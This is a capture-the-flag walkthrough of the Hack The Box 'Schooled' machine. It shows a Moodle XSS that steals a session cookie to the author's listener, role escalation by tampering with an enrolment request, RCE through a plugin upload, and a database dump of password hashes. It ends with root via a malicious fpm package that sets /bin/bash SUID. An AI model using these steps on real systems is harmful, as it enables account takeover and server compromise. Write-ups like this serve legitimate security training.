# Schooled ## Gaining Access Nmap scan: ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 33060/tcp open mysqlx ``` Did a detailed scan as well: ``` $ nmap -p 80,33060 -sC -sV --min-rate 5000 10.129.155.68 Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-09 22:25 EST Nmap scan report for 10.129.155.68 Host is up (0.0082s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15) |_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Schooled - A new kind of educational institute ``` I added `schooled.htb` to the `/etc/hosts` file as per standard HTB practice. ### Web Enum -> Moodle XSS The website was for an educational institution: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-19e7a935f58f42b76b46ba605d26e8ded2d4faf7%2Fschooled-image.png?alt=media) The page was rather static, so I did a directory and subdomain scan. `gobuster` didn't reveal much, but the `wfuzz` subdomain scan shows this: ``` $ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 20750 -H 'Host: FUZZ.schooled.htb' -u http://schooled.htb ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://schooled.htb/ Total requests: 114441 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000162: 200 1 L 5 W 84 Ch "moodle" ``` Moodle is a open-source learning platform software. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-57e57101beee61155f10ec1cc7540d5fd7fdc254%2Fschooled-image-1.png?alt=media) This is probably an outdated software with some security vulnerabilities, and the box was released back in 2021. Interestingly, there's an entire page on Hacktricks for enumerating this software. {% embed url="" %} There was a linked scanner on the page: {% embed url="" %} This allowed me to enumerate the version that was running: ``` Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta ``` On Hacktricks, there seems to be an RCE vulnerability, but that requires `manager` privileges on Moodle. I created an account and logged in to the platform. After logging in, I saw that I could enrol in courses: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-d1585e2b56108815a95c4d3def72bc1e1f4d5464%2Fschooled-image-2.png?alt=media) There was one announcement in the Mathematics course: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-009a1aaee5add477f9c66e859f16a306fcaf2a3f%2Fschooled-image-3.png?alt=media) So there's a user checking profiles, and on HTB a user checking a page consistently likely means an XSS exploit is possible. This Github repository contains steps on how to exploit the XSS affecting this version of Moodle: {% embed url="" %} Here's the payload I used: ``` ``` This would be entered into the MoodleNet profile. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-eda787d3deab054442f15f6bcd6c6072883cad01%2Fschooled-image-4.png?alt=media) After a while, a HTTP server would get a request: ``` $ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.129.155.68 - - [09/Feb/2024 23:22:34] code 404, message File not found 10.129.155.68 - - [09/Feb/2024 23:22:34] "GET /iamxss?MoodleSession=f9hp6skmrhur9ses97ti8c77u2 HTTP/1.1" 404 - ``` After replacing the cookie, I got access to the 'Manuel Phillips' user, who I presume is the course administrator. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-74c2b3a688050eaf31e0c006f6c0b472b13e560c%2Fschooled-image-5.png?alt=media) ### Teacher -> Manager -> RCE There was nothing inherently interesting about a teacher's account, however there is one CVE to go from a teacher to the site manager. {% embed url="" %} I have to 'enrol' myself as the manager, so I headed to the course the user was a teacher for and saw the 'Enrol users' option. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-c5c239c8ad69995d61d78b7aa2938105fe792f54%2Fschooled-image-6.png?alt=media) ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-87956a68ade38cdd0ed49b3a4cced6e74706b619%2Fschooled-image-7.png?alt=media) This is the request sent when I enrol someone: ```http GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=EsKjfhjhR6&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=1&userlist%5B%5D=2&roletoassign=4&startdate=4&duration= HTTP/1.1 Host: moodle.schooled.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json X-Requested-With: XMLHttpRequest Connection: close Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5 Cookie: MoodleSession=ob247gbg251898euef2hju43tc; MoodleSession=rq7psjscel1rslbh9bi7hgdaiv ``` From this, I cna change the `userlist` parameter to 24 (the current user ID) and change the `roleassign` to 1. The change is reflected on the table: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-cb3be5b77ecc030ed8543db38c31ab7a22e0956f%2Fschooled-image-8.png?alt=media) Using this, I also made the account I control a Manager. There was a new option to Login in as an administrator. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-e8f8a15730231f727c64c32c6078870887b9de4a%2Fschooled-image-9.png?alt=media) The above was possible because both users are Managers. However, because the user I cerated was a student, it had no privileges. Setting a staff like Lianne Carter to an administrator and then logging in as them allows me to access the Site Administration: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-7b18f6a68df48601459cee99c5a3f2a382b6f5f8%2Fschooled-image-10.png?alt=media) Next, I have to get full privileges over the site, and this can be done using this repo: {% embed url="" %} The above also includes the file for RCE. To use this, go to Users > Define roles > Manager. Then, just press Save changes to see this massive request: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-2540b812c87a8a3a03f5bacca3447bafa2d5a98c%2Fschooled-image-11.png?alt=media) Keep the `sesskey` variable intact and replace the rest with the payload from the repo. This opens the Plugins directory from the main admin panel: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-add39b30b62b026ad4108a0b4772d33384179f50%2Fschooled-image-12.png?alt=media) On the plugin installation page, upload `rce.zip` from the repo: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-045ebbe7dbf11aa5b69d0f99a78805743c096bf8%2Fschooled-image-13.png?alt=media) Then go ahead and install this plugin, and this would allow for rce at `http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=id`. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-096e9e543b4adb708294f351fce7530a3f2b1545%2Fschooled-image-14.png?alt=media) Then, a reverse shell is easy. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-6030908b5472499b5dc7efec98585bbe3ac01ddd%2Fschooled-image-15.png?alt=media) ## Privilege Escalation ### Database Creds -> User Hash There were 2 users on this machine: ``` [www@Schooled /usr/local/www/apache24/data/moodle]$ ls /home jamie steve ``` There was also a `config.php` file present with database credentials: ``` [www@Schooled /usr/local/www/apache24/data/moodle]$ cat config.php dbtype = 'mysqli'; $CFG->dblibrary = 'native'; $CFG->dbhost = 'localhost'; $CFG->dbname = 'moodle'; $CFG->dbuser = 'moodle'; $CFG->dbpass = 'PlaybookMaster2020'; $CFG->prefix = 'mdl_'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => 3306, 'dbsocket' => '', 'dbcollation' => 'utf8_unicode_ci', ); $CFG->wwwroot = 'http://moodle.schooled.htb/moodle'; $CFG->dataroot = '/usr/local/www/apache24/moodledata'; $CFG->admin = 'admin'; $CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems! ``` This password was not used for any user but I could login to the database to enumerate the user hashes there. I can proceed to enumerate the database: ``` $ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 moodle mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 442 Server version: 8.0.23 Source distribution Copyright (c) 2000, 2021, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. moodle@localhost [moodle]> ``` Using this, I could view the `mdl_users` table: ``` +----+---------------+-----------+--------------+---------+-----------+------------+-------------------+--------------------------------------------------------------+----------+------------+----------+----------------------------------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+-------------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+--------------+-----------------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+--------------------------------------------------------------------------------------+ | id | auth | confirmed | policyagreed | deleted | suspended | mnethostid | username | password | idnumber | firstname | lastname | email | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin | currentlogin | lastip | secret | picture | url | description | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename | moodlenetprofile | +----+---------------+-----------+--------------+---------+-----------+------------+-------------------+--------------------------------------------------------------+----------+------------+----------+----------------------------------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+-------------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+--------------+-----------------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+--------------------------------------------------------------------------------------+ | 1 | manual | 1 | 0 | 0 | 0 | 1 | guest | $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2 | | Guest user | | root@localhost | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | This user is a special user that allows read-only access to some courses. | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 1608320077 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | | 2 | manual | 1 | 0 | 0 | 0 | 1 | admin | $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW | | Jamie | Borham | jamie@staff.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 1608320129 | 1608729680 | 1608681411 | 1608729680 | 192.168.1.14 | | 0 | | | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1608389236 | 0 | | | | | | | | 3 | manual | 1 | 0 | 0 | 0 | 1 | bell_oliver89 | $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK | | Oliver | Bell | bell_oliver89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608320808 | 1608320808 | 0 | | | | | | | | 4 | manual | 1 | 0 | 0 | 0 | 1 | orchid_sheila89 | $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC | | Sheila | Orchid | orchid_sheila89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608321097 | 1608321097 | 0 | | | | | | | | 5 | manual | 1 | 0 | 0 | 0 | 1 | chard_ellzabeth89 | $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC | | Elizabeth | Chard | chard_elizabeth89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608321183 | 1608321183 | 0 | | | | | | | | 6 | manual | 1 | 0 | 0 | 0 | 1 | morris_jake89 | $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy | | Jake | Morris | morris_jake89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608380798 | 1608380798 | 0 | | | | | | | | 7 | manual | 1 | 0 | 0 | 0 | 1 | heel_james89 | $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim | | James | Heel | heel_james89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608380861 | 1608380861 | 0 | | | | | | | | 8 | manual | 1 | 0 | 0 | 0 | 1 | nash_michael89 | $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu | | Michael | Nash | nash_michael89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608380931 | 1608380931 | 0 | | | | | | | | 9 | manual | 1 | 0 | 0 | 0 | 1 | singh_rakesh89 | $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu | | Rakesh | Singh | singh_rakesh89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381002 | 1608381002 | 0 | | | | | | | | 10 | manual | 1 | 0 | 0 | 0 | 1 | taint_marcus89 | $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa | | Marcus | Taint | taint_marcus89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381073 | 1608381073 | 0 | | | | | | | | 11 | manual | 1 | 0 | 0 | 0 | 1 | walls_shaun89 | $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga | | Shaun | Walls | walls_shaun89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381128 | 1608381128 | 0 | | | | | | | | 12 | manual | 1 | 0 | 0 | 0 | 1 | smith_john89 | $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em | | John | Smith | smith_john89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381193 | 1608381193 | 0 | | | | | | | | 13 | manual | 1 | 0 | 0 | 0 | 1 | white_jack89 | $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK | | Jack | White | white_jack89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381255 | 1608381255 | 0 | | | | | | | | 14 | manual | 1 | 0 | 0 | 0 | 1 | travis_carl89 | $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S | | Carl | Travis | travis_carl89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381313 | 1608381313 | 0 | | | | | | | | 15 | manual | 1 | 0 | 0 | 0 | 1 | mac_amy89 | $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i | | Amy | Mac | mac_amy89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381361 | 1608381361 | 0 | | | | | | | | 16 | manual | 1 | 0 | 0 | 0 | 1 | james_boris89 | $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq | | Boris | James | james_boris89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381410 | 1608381410 | 0 | | | | | | | | 17 | manual | 1 | 0 | 0 | 0 | 1 | pierce_allan | $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy | | Allan | Pierce | pierce_allan89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381478 | 1608381478 | 0 | | | | | | | | 18 | manual | 1 | 0 | 0 | 0 | 1 | henry_william89 | $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu | | William | Henry | henry_william89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381530 | 1608381530 | 0 | | | | | | | | 19 | manual | 1 | 0 | 0 | 0 | 1 | harper_zoe89 | $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy | | Zoe | Harper | harper_zoe89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381592 | 1608381592 | 0 | | | | | | | | 20 | manual | 1 | 0 | 0 | 0 | 1 | wright_travis89 | $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm | | Travis | Wright | wright_travis89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381677 | 1608381677 | 0 | | | | | | | | 21 | manual | 1 | 0 | 0 | 0 | 1 | allen_matthew89 | $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq | | Matthew | Allen | allen_matthew89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381732 | 1608381732 | 0 | | | | | | | | 22 | manual | 1 | 0 | 0 | 0 | 1 | sanders_wallis89 | $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u | | Wallis | Sanders | sanders_wallis89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608381797 | 1608381797 | 0 | | | | | | | | 23 | manual | 1 | 0 | 0 | 0 | 1 | higgins_jane | $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2 | | Jane | Higgins | higgins_jane@staff.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608382421 | 1608382421 | 0 | | | | | | | | 24 | manual | 1 | 0 | 0 | 0 | 1 | phillips_manuel | $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG | | Manuel | Phillips | phillips_manuel@staff.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 1608681510 | 1707547319 | 1707547194 | 1707547319 | 127.0.0.1 | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608382537 | 1608681490 | 0 | | | | | | | | 25 | manual | 1 | 0 | 0 | 0 | 1 | carter_lianne | $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe | | Lianne | Carter | carter_lianne@staff.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1608382633 | 1608382633 | 0 | | | | | | | | 26 | email | 0 | 0 | 0 | 0 | 1 | parker_dan89 | $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi | | Dan | Parker | parker_dan89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | 6IwNTLYu1F22aFR | 0 | | NULL | 1 | 1 | 0 | 2 | 1 | 0 | 1608386568 | 1608386568 | 0 | NULL | | | | | NULL | | 27 | onlineconfirm | 1 | 0 | 0 | 0 | 1 | parker_tim89 | $2y$10$YCYp8F91YdvY2QCg3Cl5r.jzYxMwkwEm/QBGYIs.apyeCeRD7OD6S | | Tim | Parker | parker_tim89@student.schooled.htb | 0 | | | | | | | | | | | Bournemouth | GB | en | gregorian | | 99 | 1608386933 | 1608387350 | 1608386933 | 1608387350 | 192.168.1.14 | ea9Xkf0O0ZWzfRh | 0 | | NULL | 1 | 1 | 0 | 2 | 1 | 0 | 1608386929 | 1608386929 | 0 | NULL | | | | | NULL | | 28 | onlineconfirm | 1 | 0 | 0 | 0 | 1 | test12 | $2y$10$o3v7ztcnxKkVIBEREMy6HusGDgYqYerdkW4znFA.Tly9.5xX7/Xuq | | test | test | test12@student.schooled.htb | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1707545766 | 1707545988 | 0 | 1707545766 | 10.10.14.23 | mDShCSZeDnav2ZZ | 0 | | NULL | 1 | 1 | 0 | 0 | 1 | 0 | 1707545765 | 1707545791 | 0 | | | | | | | +----+---------------+-----------+--------------+---------+-----------+------------+-------------------+--------------------------------------------------------------+----------+------------+----------+----------------------------------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+-------------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+--------------+-----------------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+--------------------------------------------------------------------------------------+ ``` Massive number of hashes, and since there only `jamie` and `stevie` on the machine, I just cracked the hash for `admin`, since it used the email of `jamie`. This hash had to be brute forced character by character to give `!QAZ2wsx`, and using this I could `ssh` in as `jamie`: ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-593dbfc465434d8ff775db7598e4bd59a62809a9%2Fschooled-image-16.png?alt=media) ### Sudo Privileges This user had some `sudo` privileges: ``` jamie@Schooled:/home $ sudo -l User jamie may run the following commands on Schooled: (ALL) NOPASSWD: /usr/sbin/pkg update (ALL) NOPASSWD: /usr/sbin/pkg install * ``` GTFOBins has an entry for this particular binary, and it uses `fpm` as well. I ran the commands on my machine to make `/bin/bash` a SUID binary. ```bash TF=$(mktemp -d) echo 'chmod u+s /bin/bash' > $TF/x.sh fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF ``` Afterwards, transfer `x-1.0.txz` to the target machine, and install it using `pkg`. ![](https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-ecd76d60a45f6135039330ae91141b72fef2e33a%2Fschooled-image-17.png?alt=media) Rooted!